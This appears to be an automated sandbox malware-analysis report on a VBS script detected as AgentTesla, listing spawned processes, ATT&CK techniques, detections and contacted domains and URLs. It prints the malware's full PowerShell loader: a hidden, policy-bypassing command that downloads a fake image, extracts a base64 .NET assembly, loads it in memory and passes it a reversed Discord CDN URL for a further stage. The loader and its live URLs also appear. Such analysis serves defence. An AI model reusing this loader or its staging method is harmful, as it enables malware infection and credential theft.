          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremwdgtrevdgtredcdgtreoqdgtre3dgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtreodgtredgtre4dgtredidgtremdgtredgtreydgtredkdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdg
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('&0f00cd2a30199c7965343663efb88ef5a4901642e7ee5f97d5840e8aad1eeafa=mh&0fac3366=si&07c15366=xe?txt.swodniw/6314679686261465321/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , 'desativado' , 'desativado' , 'desativado','addinprocess32',''))} }"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremwdgtrevdgtredcdgtreoqdgtre3dgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtreodgtredgtre4dgtredidgtremdgtredgtreydgtredkdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('&0f00cd2a30199c7965343663efb88ef5a4901642e7ee5f97d5840e8aad1eeafa=mh&0fac3366=si&07c15366=xe?txt.swodniw/6314679686261465321/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , 'desativado' , 'desativado' , 'desativado','addinprocess32',''))} }"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information221
          Scripting
          Valid Accounts11
          Command and Scripting Interpreter
          221
          Scripting
          11
          Process Injection
          1
          Masquerading
          OS Credential Dumping11
          Security Software Discovery
          Remote ServicesData from Local System1
          Web Service
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Exploitation for Client Execution
          1
          Office Application Startup
          1
          DLL Side-Loading
          121
          Virtualization/Sandbox Evasion
          LSASS Memory1
          Process Discovery
          Remote Desktop ProtocolData from Removable Media1
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts3
          PowerShell
          1
          DLL Side-Loading
          Logon Script (Windows)11
          Process Injection
          Security Account Manager121
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared Drive3
          Ingress Tool Transfer
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
          Obfuscated Files or Information
          NTDS1
          Application Window Discovery
          Distributed Component Object ModelInput Capture3
          Non-Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Software Packing
          LSA Secrets2
          File and Directory Discovery
          SSHKeylogging14
          Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading
          Cached Domain Credentials12
          System Information Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          windows.vbs29%ReversingLabsScript-WScript.Trojan.AgentTesla
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://nuget.org/NuGet.exe0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
          http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          http://crl.microsoft~#0%Avira URL Cloudsafe
          https://analytics.paste.ee0%URL Reputationsafe
          https://aka.ms/pscore60%URL Reputationsafe
          http://app01.system.com.br/RDWeb/Pages/login.aspx_Tex0%Avira URL Cloudsafe
          http://crl.micro0%URL Reputationsafe
          https://cdn.discordapp.com/attachments/1235627023511191643/1235641626869764136/windows.txt?ex=66351c70&is=6633caf0&hm=afaee1daa8e0485d79f5ee7e2461094a5fe88bfe3663435697c99103a2dc00f0&0%Avira URL Cloudsafe
          https://contoso.com/0%URL Reputationsafe
          https://nuget.org/nuget.exe0%URL Reputationsafe
          https://www.google.com;0%Avira URL Cloudsafe
          https://aka.ms/pscore680%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          https://secure.gravatar.com0%URL Reputationsafe
          https://themes.googleusercontent.com0%URL Reputationsafe
          http://uploaddeimagens.com.br0%Avira URL Cloudsafe
          https://github.com/Pester/Pester0%Avira URL Cloudsafe
          https://uploaddeimagens.com.br0%Avira URL Cloudsafe
          https://paste.ee/&0%Avira URL Cloudsafe
          https://analytics.paste.ee;0%Avira URL Cloudsafe
          https://www.google.com0%Avira URL Cloudsafe
          https://paste.ee/l0%Avira URL Cloudsafe
          http://app01.system.com.br/RDWeb/Pages/login.aspxd0%Avira URL Cloudsafe
          https://cdnjs.cloudflare.com;0%Avira URL Cloudsafe
          https://cdnjs.cloudflare.com0%Avira URL Cloudsafe
          https://pastsubposto.subpostosubposto/d/umxfl0%Avira URL Cloudsafe
          https://paste.ee/d/umxfl0%Avira URL Cloudsafe
          https://go.microsoft.coT0%Avira URL Cloudsafe
          https://pastsubposto.subpostosubposto/d/um0%Avira URL Cloudsafe
          https://paste.ee/d/umxfl&0%Avira URL Cloudsafe
          https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029100%Avira URL Cloudmalware
          http://app01.system.com.br/RDWeb/Pages/login.aspx0%Avira URL Cloudsafe
          https://paste.ee/d/umxflJ0%Avira URL Cloudsafe
          https://paste.ee/d/umxflerD0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          paste.ee
          188.114.97.3
          truetrue
            unknown
            cdn.discordapp.com
            162.159.129.233
            truefalse
              unknown
              uploaddeimagens.com.br
              188.114.96.3
              truetrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                https://cdn.discordapp.com/attachments/1235627023511191643/1235641626869764136/windows.txt?ex=66351c70&is=6633caf0&hm=afaee1daa8e0485d79f5ee7e2461094a5fe88bfe3663435697c99103a2dc00f0&false
                • Avira URL Cloud: safe
                unknown
                https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029true
                • Avira URL Cloud: malware
                unknown
                https://paste.ee/d/umxfltrue
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://crl.microsoft~#powershell.exe, 00000006.00000002.3047439942.000001D4C3D20000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.2886427774.000002CA256FF000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://app01.system.com.br/RDWeb/Pages/login.aspx_Texwscript.exe, 00000000.00000003.2325512254.000001250FD74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2326031502.000001250FD7A000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.2702281796.000002CA158B3000.00000004.00000800.00020000.00000000.sdmptrue
                • URL Reputation: malware
                unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.2702281796.000002CA158B3000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://contoso.com/Licensepowershell.exe, 00000008.00000002.2886427774.000002CA256FF000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://www.google.com;wscript.exe, 00000000.00000002.2522195506.000001250E000000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2519666628.0000012510143000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2522818795.0000012510143000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2520794814.0000012510205000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://contoso.com/Iconpowershell.exe, 00000008.00000002.2886427774.000002CA256FF000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://analytics.paste.eewscript.exe, 00000000.00000002.2522195506.000001250E000000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2520794814.0000012510205000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://aka.ms/pscore6powershell.exe, 00000006.00000002.3007331648.000001D4ABB39000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://uploaddeimagens.com.brpowershell.exe, 00000008.00000002.2702281796.000002CA1BB7D000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://paste.ee/d/umxflJwscript.exe, 00000000.00000003.2519666628.0000012510114000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2522818795.0000012510114000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://paste.ee/&wscript.exe, 00000000.00000002.2522818795.00000125100FE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2519666628.00000125100FE000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.2702281796.000002CA158B3000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://paste.ee/lwscript.exe, 00000000.00000002.2522818795.00000125100FE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2519666628.00000125100FE000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://app01.system.com.br/RDWeb/Pages/login.aspxdwscript.exe, 00000000.00000003.2325461625.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2514780950.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2325898663.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2326061758.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2325544492.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2326031502.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2520623399.000001250FDA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2516046227.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2519449118.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2514887391.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2325932418.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2326000668.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2325969324.000001250FD9E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://www.google.comwscript.exe, 00000000.00000002.2522195506.000001250E000000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2520794814.0000012510205000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://crl.microwscript.exe, 00000000.00000002.2523019692.0000012510B40000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://paste.ee/d/umxflerDwscript.exe, 00000000.00000003.2520313262.000001250E086000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2522362736.000001250E087000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://uploaddeimagens.com.brpowershell.exe, 00000008.00000002.2702281796.000002CA158B3000.00000004.00000800.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://contoso.com/powershell.exe, 00000008.00000002.2886427774.000002CA256FF000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.2886427774.000002CA256FF000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://analytics.paste.ee;wscript.exe, 00000000.00000002.2522195506.000001250E000000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2520794814.0000012510205000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://paste.ee/d/umxfl&wscript.exe, 00000000.00000003.2519666628.0000012510114000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2522818795.0000012510114000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://cdnjs.cloudflare.comwscript.exe, 00000000.00000002.2522195506.000001250E000000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2520794814.0000012510205000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://aka.ms/pscore68powershell.exe, 00000006.00000002.3007331648.000001D4ABB96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2702281796.000002CA15691000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://cdnjs.cloudflare.com;wscript.exe, 00000000.00000002.2522195506.000001250E000000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2519666628.0000012510143000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2522818795.0000012510143000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2520794814.0000012510205000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://pastsubposto.subpostosubposto/d/umxflwscript.exe, 00000000.00000003.2325969324.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, windows.vbsfalse
                • Avira URL Cloud: safe
                unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.3007331648.000001D4ABBAB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2702281796.000002CA15691000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://secure.gravatar.comwscript.exe, 00000000.00000002.2522195506.000001250E000000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2520794814.0000012510205000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
